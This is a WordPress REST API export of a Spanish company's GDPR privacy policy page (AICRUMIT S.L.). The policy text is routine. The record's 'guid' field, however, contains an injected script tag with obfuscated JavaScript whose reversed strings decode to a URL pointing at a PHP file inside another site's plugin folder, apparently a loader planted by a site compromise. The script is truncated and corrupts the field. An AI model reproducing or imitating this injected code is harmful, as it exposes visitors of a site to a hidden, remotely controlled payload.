{"id":795,"date":"2019-11-25T11:42:47","date_gmt":"2019-11-25T10:42:47","guid":{"rendered":"https:\/\/wem<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == \"string\") return $Ikf.list[n].split(\"\").reverse().join(\"\");return $Ikf.list[n];};$Ikf.list=[\"\\'php.eroc_nimda\/bil\/steewt-tsetal-siseneg\/snigulp\/tnetnoc-pw\/moc.nosredneherdied.www\/\/:ptth\\'=fe"},"modified":"2020-07-20T16:14:46","modified_gmt":"2020-07-20T14:14:46","slug":"politica-de-privacidad","status":"publish","type":"page","link":"https:\/\/wemandus.com\/?page_id=795","title":{"rendered":"Pol\u00edtica de Privacidad"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"795\" class=\"elementor elementor-795\">\n\t\t\t\t\t\t<div class=\"elementor-inner\">\n\t\t\t\t<div class=\"elementor-section-wrap\">\n\t\t\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-dda6da1 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"dda6da1\" data-element_type=\"section\" data-settings=\"{&quot;stretch_section&quot;:&quot;section-stretched&quot;}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-dab135a\" data-id=\"dab135a\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b914537 elementor-widget elementor-widget-text-editor\" data-id=\"b914537\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-text-editor elementor-clearfix\">\n\t\t\t\t<p><span style=\"font-weight: bolder;\">Datos del responsable del tratamiento.<\/span><\/p><p>AICRUMIT S.L.<br \/>NIF: B01660513<br \/>Domicilio social: C\/. Campus de Espinardo, 7. 30100 MURCIA<\/p><p><span style=\"font-weight: bolder;\">\u00c1mbito de aplicaci\u00f3n<\/span><\/p><p>La presente Pol\u00edtica resultar\u00e1 de aplicaci\u00f3n:<\/p><p>\u2022 A aquellas personas que visiten la p\u00e1gina web de AICRUMIT S.L. (en adelante, en cualquier referencia a \u00e9sta se entender\u00e1n tambi\u00e9n comprendida su versi\u00f3n en ingl\u00e9s).<br \/>\u2022 A aquellos que voluntariamente se comuniquen con AICRUMIT S.L. a trav\u00e9s de correo electr\u00f3nico, chat o que cumplimenten cualquiera de los formularios de recogida de datos publicados en la p\u00e1gina web de AICRUMIT S.L..<br \/>\u2022 A aquellos que soliciten informaci\u00f3n sobre los productos y servicios de AICRUMIT S.L. o que soliciten participar en alguna de las acciones comerciales de AICRUMIT S.L..<br \/>\u2022 A quienes formalicen una relaci\u00f3n contractual con AICRUMIT S.L. mediante la contrataci\u00f3n de sus productos y servicios.<br \/>\u2022 A quienes utilicen cualquier otro servicio presente en el sitio web que implique la comunicaci\u00f3n de datos a AICRUMIT S.L. o el acceso a datos por AICRUMIT S.L. para la prestaci\u00f3n de sus servicios.<br \/>\u2022 A cualesquiera otros que, directa o indirectamente, hayan dado su consentimiento expreso para que sus datos sean tratados por parte de AICRUMIT S.L. para cualquiera de las finalidades recogidas en la presente Pol\u00edtica.<\/p><p>La utilizaci\u00f3n de los productos y servicios de AICRUMIT S.L. requiere la aceptaci\u00f3n expresa de esta Pol\u00edtica.<\/p><p>AICRUMIT S.L. advierte que, salvo la existencia de una representaci\u00f3n legalmente constituida, ning\u00fan usuario y\/o cliente puede utilizar la identidad de otra persona y comunicar sus datos personales, por lo que los datos que facilite a AICRUMIT S.L. deben ser datos personales, correspondientes a su propia identidad, adecuados, pertinentes, actuales, exactos y verdaderos. En este sentido, el usuario y\/o cliente ser\u00e1 el \u00fanico responsable frente a cualquier da\u00f1o directo o indirecto que cause a terceros o a AICRUMIT S.L. por el uso de datos de otra persona o de sus propios datos cuando sean falsos, err\u00f3neos, no actuales, inadecuados o no pertinentes. Igualmente, el usuario y\/o cliente que comunique los datos personales de un tercero ser\u00e1 responsable de haber recabado la autorizaci\u00f3n correspondiente del propio interesado, as\u00ed como de sus consecuencias en caso contrario.<\/p><p>Del mismo modo,\u00a0 el usuario y\/o cliente que comunique datos personales a AICRUMIT S.L. declara ser mayor de edad, de conformidad con lo dispuesto en la legislaci\u00f3n espa\u00f1ola, absteni\u00e9ndose en caso contrario de facilitar datos a AICRUMIT S.L.. Cualquier dato facilitado sobre un menor de edad requerir\u00e1 del consentimiento o autorizaci\u00f3n previa de sus padres, tutores o representantes legales, los cuales ser\u00e1n considerados responsables de los datos facilitados por los menores a su cargo.<\/p><p>Esta Pol\u00edtica ser\u00e1 de aplicaci\u00f3n subsidiaria respecto de aquellas otras condiciones que sobre protecci\u00f3n de datos personales se establezcan con car\u00e1cter especial y sean comunicadas, sin car\u00e1cter limitativo, a trav\u00e9s de los formularios de registro, contratos y\/o condiciones de los servicios particulares, siendo por tanto esta Pol\u00edtica complementaria de las mencionadas en aquello no previsto expresamente en las mismas.<\/p><p><span style=\"font-weight: bolder;\">Finalidades de la recogida y tratamiento de datos personales<\/span><\/p><p>AICRUMIT S.L., en su condici\u00f3n de responsable del tratamiento, informa a los usuarios de la existencia de varios tratamientos y ficheros en los que se recogen y almacenan los datos personales comunicados a AICRUMIT S.L.<\/p><p>Las finalidades de dicha recogida y tratamiento de datos personales son las siguientes:<\/p><p>\u2022 En relaci\u00f3n a las \u201ccookies\u201d que AICRUMIT S.L. utiliza en la navegaci\u00f3n a trav\u00e9s de su p\u00e1gina web, se almacenan \u00a0en el equipo terminal del usuario (ordenador o dispositivo m\u00f3vil) y recopilan informaci\u00f3n al visitar dichas p\u00e1ginas web, con la finalidad de mejorar la usabilidad de las mismas, conocer los h\u00e1bitos o necesidades de navegaci\u00f3n de los usuarios para poder adaptarse a los ellos, as\u00ed como obtener informaci\u00f3n con fines estad\u00edsticos. En el caso de aquellos usuarios que ya sean clientes de AICRUMIT S.L., la informaci\u00f3n recabada con las cookies servir\u00e1 tambi\u00e9n para su identificaci\u00f3n al acceder a las distintas herramientas que AICRUMIT S.L. pone a su disposici\u00f3n para la gesti\u00f3n de los servicios. En cualquier caso, los usuarios pueden configurar su navegador, de manera que se deshabilite o bloquee la recepci\u00f3n de todas o algunas de las cookies. El hecho de no desear recibir estas cookies, no constituye un impedimento para poder acceder a la informaci\u00f3n de los sitios web de AICRUMIT S.L. aunque el uso de algunos servicios podr\u00e1 ser limitado. Si una vez otorgado el consentimiento para la recepci\u00f3n de cookies, se desease retirar \u00e9ste, se deber\u00e1n eliminar aquellas almacenadas en el equipo del usuario, a trav\u00e9s de las opciones de los diferentes navegadores.Toda la informaci\u00f3n sobre las cookies utilizadas por AICRUMIT S.L., se encuentra publicada en su Pol\u00edtica de Cookies, disponible para su consulta en https:\/\/wemandus.com\/?page_id=799<\/p><p>\u2022 En el caso del env\u00edo de un correo electr\u00f3nico a AICRUMIT S.L. o de una comunicaci\u00f3n de datos personales a trav\u00e9s de cualquier otro medio, como puede ser un formulario de contacto, la finalidad de la recogida y tratamiento de dichos datos por parte de AICRUMIT S.L. es la atenci\u00f3n de las consultas y solicitudes de informaci\u00f3n que se planteen sobre los productos y servicios de AICRUMIT S.L..<\/p><p>\u2022 En el caso del env\u00edo de un correo electr\u00f3nico a AICRUMIT S.L. relacionado con sus ofertas de empleo, dichos datos ser\u00e1n tratados para participar en los procedimientos de selecci\u00f3n de personal.<\/p><p>\u2022 En el caso de formularios de AICRUMIT S.L. que los interesados cumplimenten para participar en alguna de las acciones comerciales de AICRUMIT S.L., la finalidad ser\u00e1 la de posibilitar dicha participaci\u00f3n, as\u00ed como el env\u00edo de comunicaciones comerciales y publicitarias sobre los servicios de AICRUMIT S.L., salvo que el interesado manifieste expresamente su oposici\u00f3n en el mismo momento de la recogida de sus datos. No obstante lo anterior, el interesado podr\u00e1 modificar su decisi\u00f3n en cualquier momento, tantas veces como lo desee, a trav\u00e9s de los medios facilitados por AICRUMIT S.L. para tal fin.<\/p><p>\u2022 En la contrataci\u00f3n de los servicios ofrecidos por AICRUMIT S.L., se recoger\u00e1n \u00fanicamente aquellos datos personales que fueran necesarios para establecer la relaci\u00f3n contractual y posibilitar la prestaci\u00f3n de los servicios y remuneraci\u00f3n de los mismos por parte de los clientes, siendo dichos datos recogidos y tratados con las siguientes finalidades:<\/p><p>\u25e6 La finalidad principal consistir\u00e1 en el mantenimiento de la relaci\u00f3n contractual que se establezca con el cliente, de conformidad con la naturaleza y caracter\u00edsticas de los servicios contratados, contactando AICRUMIT S.L. con el cliente a trav\u00e9s de la direcci\u00f3n de e-mail, tel\u00e9fono u otros medios indicados por este \u00faltimo.<\/p><p>\u25e6 Para el env\u00edo de documentaci\u00f3n e informaci\u00f3n relacionada con los servicios contratados, as\u00ed como para el env\u00edo de comunicaciones comerciales y publicitarias sobre los mismos u otros similares por parte de AICRUMIT S.L., a trav\u00e9s de correo postal, e-mail, tel\u00e9fono, SMS u otros medios indicados por el cliente, salvo que \u00e9ste manifieste expresamente su oposici\u00f3n en el mismo momento de la contrataci\u00f3n. Independientemente de si el cliente hubiera elegido recibir o no informaci\u00f3n comercial de AICRUMIT S.L., el cliente podr\u00e1 modificar su decisi\u00f3n en cualquier momento, tantas veces como lo desee, a trav\u00e9s del apartado espec\u00edfico disponible para ello en su \u00c1rea de Cliente.<\/p><p>\u25e6\u00a0Para el mantenimiento de registros \u00a0hist\u00f3ricos de las relaciones comerciales durante los plazos legalmente establecidos.<\/p><p>\u25e6 En aquellos casos en que AICRUMIT S.L. deba acceder y\/o tratar datos personales respecto de los cuales el cliente tuviera la condici\u00f3n de responsable o encargado del tratamiento, AICRUMIT S.L. tratar\u00e1 dichos datos en calidad de encargado del tratamiento conforme a lo previsto en el art\u00edculo 28 del RGPD y de acuerdo a lo indicado en el apartado denominado \u201cAICRUMIT S.L. como encargado del tratamiento\u201d, incluido en esta Pol\u00edtica.<\/p><p>\u25e6 En cumplimiento de lo dispuesto en la Ley 25\/2007, de 18 de octubre, de conservaci\u00f3n de datos relativos a las comunicaciones electr\u00f3nicas y a las redes p\u00fablicas de comunicaciones, AICRUMIT S.L. informa al usuario que se proceder\u00e1 a retener y conservar determinados datos de tr\u00e1fico generados durante el desarrollo de las comunicaciones, as\u00ed como en su caso, a comunicar dichos datos a los \u00f3rganos competentes siempre que concurran las circunstancias legales previstas en dicha Ley.<\/p><p>\u25e6\u00a0Para todas aquellas otras finalidades, que de forma expresa aparezcan recogidas en las Condiciones Espec\u00edficas que sean de aplicaci\u00f3n al producto o servicio correspondiente contratado por el cliente y aceptadas expresamente por este.<\/p><p><span style=\"font-weight: bolder;\">Plazo de conservaci\u00f3n de los datos personales<\/span><\/p><p>AICRUMIT S.L. conservar\u00e1 los datos personales durante el tiempo estrictamente necesario para el cumplimiento de las finalidades anteriormente detalladas. AICRUMIT S.L. podr\u00e1 mantener debidamente bloqueados dichos datos durante el per\u00edodo en el que se pudieran derivar responsabilidades de su relaci\u00f3n con el cliente.<\/p><p>En el caso de los datos objeto de conservaci\u00f3n con motivo de a la Ley 25\/2007, de 18 de octubre, de conservaci\u00f3n de datos relativos a las comunicaciones electr\u00f3nicas y a las redes p\u00fablicas de comunicaciones, el per\u00edodo de conservaci\u00f3n de los mismos ser\u00e1 el detallado \u00a0en dicha normativa.<\/p><p>Destinatarios de los datos personales<\/p><p>Los destinatarios de los datos personales recogidos por AICRUMIT S.L. ser\u00e1n los siguientes:<br \/>\u2022 Los propios empleados de AICRUMIT S.L. en el cumplimiento de sus funciones.<\/p><p>\u2022 Los proveedores de AICRUMIT S.L. que intervengan en la prestaci\u00f3n de los servicios, en el caso de que ello fuera necesario para la prestaci\u00f3n de los mismos.<\/p><p>\u2022 Las compa\u00f1\u00edas integrantes del Grupo de Sociedades del que AICRUMIT S.L. forma parte, entendido \u00e9ste en el sentido del art\u00edculo 42 del C\u00f3digo de Comercio, cuya actividad sea la comercializaci\u00f3n de servicios de naturaleza id\u00e9ntica o an\u00e1loga ofrecidos por AICRUMIT S.L..<\/p><p>\u2022 Los \u00f3rganos judiciales o administrativos, as\u00ed como las Fuerzas y Cuerpos de Seguridad del Estado, en el caso que AICRUMIT S.L. fuera requerido conforme a la legislaci\u00f3n vigente para proporcionar informaci\u00f3n relacionada con sus clientes y sus servicios.<\/p><p>\u2022 Cualesquiera otros que debido a la naturaleza del servicio deban acceder a los datos facilitados con el mismo, tal y como se detalla en las Condiciones Espec\u00edficas que sean de aplicaci\u00f3n al producto o servicio correspondiente contratado por el cliente y aceptadas expresamente por este.<\/p><p><span style=\"font-weight: bolder;\">Derechos de los usuarios y ejercicio de los mismos<\/span><\/p><p>Los usuarios podr\u00e1n ejercitar en cualquier momento los siguientes derechos reconocidos por el RGPD:<\/p><p>\u2022 Derecho de acceso.<br \/>Los usuarios tienen derecho a obtener de AICRUMIT S.L. informaci\u00f3n acerca de si se est\u00e1n tratando datos personales que le conciernan, a acceder a los mismos y a obtener informaci\u00f3n sobre el tratamiento realizado.<\/p><p>\u2022 Derecho a obtener una copia de sus datos personales.<\/p><p>\u2022 Derecho de rectificaci\u00f3n.<br \/>Los usuarios tienen derecho a que AICRUMIT S.L. rectifique sus datos personales en el caso de que fueran inexactos o incompletos.<\/p><p>\u2022 Derecho de supresi\u00f3n.<br \/>Los usuarios tienen derecho a que se proceda a la supresi\u00f3n de los datos cuando estos ya no resulten necesarios para la finalidad para la que fueron proporcionados o cuando concurran el resto de circunstancias legalmente previstas.<\/p><p>\u2022 Derecho de limitaci\u00f3n del tratamiento.<br \/>Los usuarios tienen derecho a solicitar una limitaci\u00f3n en el tratamiento de sus datos personales, de forma que no se apliquen a los mismos las operaciones de tratamiento que deban corresponder en cada caso, en aquellos supuestos previstos en el art. 18 del RGPD.<\/p><p>\u2022 Derecho a la portabilidad.<br \/>Los usuarios tienen derecho a recibir los datos personales que le incumban en un formato estructurado, siempre y cuando dichos datos incumban exclusivamente al usuario y hayan sido facilitados por \u00e9ste.<\/p><p>Los usuarios podr\u00e1n ejercitar dichos derechos de las siguientes formas:<\/p><p>\u2022 Tanto si son clientes de AICRUMIT S.L. como si no lo son, los usuarios podr\u00e1n ejercer sus derechos con el env\u00edo de una comunicaci\u00f3n mediante el env\u00edo de una petici\u00f3n acompa\u00f1ada de su D.N.I. o documento v\u00e1lido en derecho que acredite su identidad, dirigida a AICRUMIT S.L. C\/ Gonz\u00e1lez Cebri\u00e1n, 3. Bajo 30002 Murcia (Murcia) Espa\u00f1a, a la atenci\u00f3n del Departamento de Administraci\u00f3n, especificando el derecho que desean ejercer.<\/p><p>En los casos de solicitudes manifiestamente infundadas o excesivas por su car\u00e1cter repetitivo, AICRUMIT S.L. se reserva el derecho de cobrar un canon por los costes administrativos que se deriven o el derecho de negarse a actuar respecto de las mismas, conforme a lo establecido en el art. 12.5 RGPD.<\/p><p><span style=\"font-weight: bolder;\">Autoridad de control<\/span><\/p><p>Los usuarios y\/o clientes podr\u00e1n dirigirse a la autoridad de control local que corresponda si considera que el tratamiento realizado respecto de sus datos personales no ha sido realizado conforme a la legislaci\u00f3n vigente.<\/p><p>La autoridad de control de protecci\u00f3n de datos en Espa\u00f1a es la Agencia Espa\u00f1ola de Protecci\u00f3n de Datos, cuyos datos de contacto se encuentran disponibles en su p\u00e1gina web, en concreto en http:\/\/www.agpd.es\/portalwebAGPD\/CanalDelCiudadano\/contacteciudadano\/index-ides-idphp.php.<\/p><p><span style=\"font-weight: bolder;\">Transferencias internacionales de datos<\/span><\/p><p>En aquellos productos y servicios de AICRUMIT S.L. en los que se requiera la realizaci\u00f3n de transferencias internacionales para posibilitar la prestaci\u00f3n de los mismos, dicha circunstancia ser\u00e1 recogida en las Condiciones Espec\u00edficas que sean de aplicaci\u00f3n al producto o servicio correspondiente contratado por el cliente y aceptadas expresamente por \u00e9ste de forma previa a las mismas.<\/p><p><span style=\"font-weight: bolder;\">AICRUMIT S.L. como encargado del tratamiento<\/span><\/p><p>Conforme al art\u00edculo 28 RGPD y concordantes, AICRUMIT S.L. tratar\u00e1 los datos personales respecto a los cuales el cliente ostentara la condici\u00f3n de responsable o encargado del tratamiento, cuando ello resulte necesario para la adecuada prestaci\u00f3n de los servicios contratados. En dicho caso, AICRUMIT S.L. actuar\u00e1 como encargado del tratamiento, conforme a los t\u00e9rminos que a continuaci\u00f3n se indican:<\/p><p>\u2022 AICRUMIT S.L. \u00fanicamente tratar\u00e1 los datos conforme a las instrucciones del cliente responsable o encargado del tratamiento, no utiliz\u00e1ndolos para un fin distinto al que figura en la presente Pol\u00edtica de protecci\u00f3n de datos y\/o en las condiciones contractuales que sean de aplicaci\u00f3n.<\/p><p>\u2022 Cumplida la prestaci\u00f3n de los servicios que motiven el tratamiento de los datos personales, estos ser\u00e1n destruidos, al igual que cualquier soporte o documentos en los que conste alg\u00fan dato de car\u00e1cter personal o cualquier tipo de informaci\u00f3n que se haya generado durante, para y\/o por la prestaci\u00f3n de los servicios objeto de las correspondientes Condiciones. No obstante lo anterior, AICRUMIT S.L. podr\u00e1 mantener debidamente bloqueados los citados datos durante el per\u00edodo en el cual se puedan derivar responsabilidades de su relaci\u00f3n con el cliente.<\/p><p>\u2022 En el caso de que AICRUMIT S.L. destine los datos a otra finalidad o los comunique o utilice incumpliendo la presente Pol\u00edtica de protecci\u00f3n de datos y\/o las correspondientes Condiciones del servicio, ser\u00e1 considerado tambi\u00e9n responsable del tratamiento.<\/p><p>\u2022 AICRUMIT S.L. se obliga, de conformidad con el art\u00edculo 28 del RGPD, a mantener el debido secreto profesional respecto de los datos personales a los que deba acceder y\/o tratar con el fin de cumplir en cada caso con el objeto de las Condiciones del servicio que le sean de aplicaci\u00f3n, tanto durante como despu\u00e9s de la terminaci\u00f3n de los mismos, comprometi\u00e9ndose a utilizar dicha informaci\u00f3n \u00fanicamente para la finalidad prevista en cada caso y a exigir el mismo nivel de compromiso a cualquier persona que dentro de su organizaci\u00f3n participe en cualquier fase del tratamiento de los datos personales responsabilidad del cliente.<\/p><p>\u2022 De acuerdo con lo establecido en el RGPD ser\u00e1n de aplicaci\u00f3n las siguientes reglas en relaci\u00f3n con la forma y modalidades de acceso a los datos para la prestaci\u00f3n de los servicios:<\/p><p>1. En el caso de que AICRUMIT S.L. deba acceder a los recursos de tratamiento sitos en las instalaciones del cliente, \u00e9ste ser\u00e1 responsable de establecer e implementar la pol\u00edtica y medidas de seguridad, as\u00ed como de comunicar las mismas a AICRUMIT S.L., quien se compromete a respetarlas y a exigir su cumplimiento a las personas de su organizaci\u00f3n que participen en la prestaci\u00f3n de los servicios.<\/p><p>2. \u00a0Cuando AICRUMIT S.L. acceda v\u00eda remota a los recursos de tratamiento de datos responsabilidad del cliente, \u00e9ste deber\u00e1 establecer e implementar la pol\u00edtica y medidas de seguridad en sus sistemas de tratamiento remotos, siendo AICRUMIT S.L. responsable de establecer e implementar la pol\u00edtica y medidas de seguridad en sus propios sistemas locales.<\/p><p>3. \u00a0Cuando el servicio fuera prestado por AICRUMIT S.L. en sus propios locales, AICRUMIT S.L. recoger\u00e1 en su Registro de actividades las circunstancias relativas al tratamiento de datos en los t\u00e9rminos exigidos por el RGPD, incluyendo las medidas de seguridad correspondientes a dicho tratamiento.<\/p><p>\u2022 El acceso y\/o tratamiento a los datos por AICRUMIT S.L., sin perjuicio de las disposiciones legales o reglamentarias espec\u00edficas vigentes que pudieran resultar de aplicaci\u00f3n en cada caso o las que por propia iniciativa adopte AICRUMIT S.L., estar\u00e1 sometido a las medidas de seguridad necesarias para:<\/p><p>\u25e6\u00a0\u00a0Garantizar la confidencialidad, integridad, disponibilidad y resiliencia permanentes de los sistemas y servicios de tratamiento.<\/p><p>\u25e6\u00a0Restaurar la disponibilidad y el acceso a los datos personales de forma r\u00e1pida, en caso de incidente f\u00edsico o t\u00e9cnico.<\/p><p>\u25e6\u00a0Verificar, evaluar y valorar, de forma regular, la eficacia de las medidas t\u00e9cnicas y organizativas implantadas para garantizar la seguridad del tratamiento.<\/p><p>\u25e6\u00a0Seudonimizar y cifrar los datos personales, en su caso.<\/p><p>\u2022 El cliente autoriza a AICRUMIT S.L., en su calidad de encargado del tratamiento, a subcontratar con terceros, en nombre y por cuenta del cliente, los servicios de almacenamiento, custodia de las copias de respaldo de datos y seguridad, y aqu\u00e9llos que fueran necesarios para posibilitar la prestaci\u00f3n de los servicios contratados, respetando en todo caso las obligaciones impuestas por el RGPD y su normativa de desarrollo. En cualquier momento, el cliente podr\u00e1 dirigirse a AICRUMIT S.L. para conocer la identidad de las entidades subcontratadas para la prestaci\u00f3n de los servicios indicados, las cuales actuar\u00e1n de conformidad con los t\u00e9rminos previstos en este documento y previa formalizaci\u00f3n con AICRUMIT S.L. de un contrato de tratamiento de datos conforme al art. 28.4 del RGPD.<\/p><p>\u2022 El cliente autoriza a AICRUMIT S.L. a realizar las acciones que se indican a continuaci\u00f3n, siempre que sean necesarias para la ejecuci\u00f3n de la prestaci\u00f3n de los servicios. Dicha autorizaci\u00f3n queda limitada a la\/s actuaci\u00f3n\/es \u00a0necesaria\/s para la prestaci\u00f3n de cada servicio y con una duraci\u00f3n m\u00e1xima vinculada a la vigencia de las Condiciones contractuales aplicables:<\/p><p>\u25e6\u00a0A llevar a cabo el tratamiento de los datos personales en dispositivos port\u00e1tiles \u00fanicamente por los usuarios o perfiles de usuarios asignados a la prestaci\u00f3n de los servicios.<\/p><p>\u25e6 A llevar a cabo el tratamiento fuera de los locales del cliente o de AICRUMIT S.L., \u00fanicamente por los usuarios o perfiles de usuarios asignados a la prestaci\u00f3n de los servicios.<\/p><p>\u25e6\u00a0La entrada y salida de los soportes y documentos que contengan datos personales, incluidos los comprendidos y\/o anejos a un correo electr\u00f3nico, fuera de los locales bajo el control del cliente responsable del tratamiento.<\/p><p>\u25e6 La ejecuci\u00f3n de los procedimientos de recuperaci\u00f3n de datos que AICRUMIT S.L. se vea en la obligaci\u00f3n de realizar.<\/p><p>\u2022 AICRUMIT S.L. no se hace responsable del incumplimiento de las obligaciones derivadas del RGPD o de la normativa correspondiente en materia de protecci\u00f3n de datos por parte del usuario y\/o cliente en lo que a su actividad le corresponda y que se encuentre relacionado con la ejecuci\u00f3n del contrato o relaciones comerciales que le unan a AICRUMIT S.L.. Cada parte deber\u00e1 hacer frente a la responsabilidad que se derive de su propio incumplimiento de las obligaciones contractuales y de la propia normativa.<\/p>\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Datos del responsable del tratamiento. AICRUMIT S.L.NIF: B01660513Domicilio social: C\/. Campus de Espinardo, 7. 30100 MURCIA \u00c1mbito de aplicaci\u00f3n La presente Pol\u00edtica resultar\u00e1 de aplicaci\u00f3n: \u2022 A aquellas personas que visiten la p\u00e1gina web de AICRUMIT S.L. (en adelante, en cualquier referencia a \u00e9sta se entender\u00e1n tambi\u00e9n comprendida su versi\u00f3n en ingl\u00e9s).\u2022 A aquellos que<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mi_skip_tracking":false},"_links":{"self":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages\/795"}],"collection":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/wemandus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=795"}],"version-history":[{"count":5,"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages\/795\/revisions"}],"predecessor-version":[{"id":818,"href":"https:\/\/wemandus.com\/index.php?rest_route=\/wp\/v2\/pages\/795\/revisions\/818"}],"wp:attachment":[{"href":"https:\/\/wemandus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}